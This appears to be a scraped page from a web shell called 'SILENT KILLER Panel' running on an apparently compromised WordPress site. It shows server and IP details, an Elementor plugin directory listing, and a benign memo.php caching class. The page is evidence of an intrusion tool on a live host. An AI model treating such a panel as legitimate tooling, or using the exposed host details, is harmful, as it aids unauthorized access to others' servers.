SILENT KILLERPanel

Current Path: > home > codekrsu > > ameliagraphics.com > wp-content > plugins > > elementor > > modules > atomic-widgets


Operation   : Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
Software     : Apache
Server IP    : 162.0.232.56 | Your IP: 216.73.216.111
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/codekrsu//ameliagraphics.com/wp-content/plugins//elementor//modules/atomic-widgets

NameTypeSizeLast ModifiedActions
base Directory - -
controls Directory - -
database Directory - -
dynamic-tags Directory - -
elements Directory - -
image Directory - -
import-export Directory - -
parsers Directory - -
prop-dependencies Directory - -
prop-types Directory - -
props-resolver Directory - -
styles Directory - -
template-renderer Directory - -
cache-validity.php File 2269 bytes August 05 2025 18:00:00.
memo.php File 460 bytes August 05 2025 18:00:00.
module.php File 17889 bytes August 05 2025 18:00:00.
opt-in.php File 2507 bytes August 05 2025 18:00:00.
utils.php File 727 bytes April 28 2025 11:15:16.

Reading File: /home/codekrsu//ameliagraphics.com/wp-content/plugins//elementor//modules/atomic-widgets/memo.php

<?php

namespace Elementor\Modules\AtomicWidgets;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Memo {
	private array $cache = [];

	public function memoize( string $key, callable $callback ) {
		return function() use ( $key, $callback ) {
			if ( array_key_exists( $key, $this->cache ) ) {
				return $this->cache[ $key ];
			}

			$this->cache[ $key ] = call_user_func( $callback );
			return $this->cache[ $key ];
		};
	}
}

SILENT KILLER Tool